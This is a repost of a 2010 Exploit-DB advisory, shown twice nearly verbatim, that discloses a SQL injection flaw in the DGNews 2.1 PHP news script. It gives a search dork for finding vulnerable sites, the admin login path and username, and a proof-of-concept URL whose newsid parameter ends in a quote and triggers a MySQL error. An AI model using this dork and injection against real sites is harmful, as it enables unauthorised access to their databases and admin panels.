DGNews 2.1 – SQL Injection - 体验盒子

作者： kalashnikov

日期： 2010-12-29

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/15853/

#Remote SQL Injection Vulnerability
#name: DGNews v 2.1
#Author: kalashnikov
#dork: inurl:news.php?go=fullnews&newsid
#admincp : admin/login.php 
// the user is "admin"===========MYSQL INJ=======
http://localhost/pach/news.php?go=fullnews&newsid=1'
===========================
Warning: mysql_num_rows(): /home/user/public_html/news.php on line 227===========================
# Site: http://vbspiders.com
# Group : KaLa$nikoV t34m
# Date: {26-12-2010}
# Software: DGNews v 2.1
# Greetz: just me :L
# team: VoLc4n0 --=-- stone love --=-- fla$h 

#Remote SQL Injection Vulnerability
#name: DGNews v 2.1#
Author: kalashnikov
#dork: inurl:news.php?go=fullnews&newsid
#admincp : admin/login.php 
// the user is "admin"===========MYSQL INJ=======
http://localhost/pach/news.php?go=fullnews&newsid=1' 
===========================
Warning: mysql_num_rows(): /home/user/public_html/news.php on line 227
===========================
# Site: http://vbspiders.com
# Group : KaLa$nikoV t34m
# Date: {26-12-2010}# Software: DGNews v 2.1# Greetz: just me :L
# team: VoLc4n0 --=-- stone love --=-- fla$h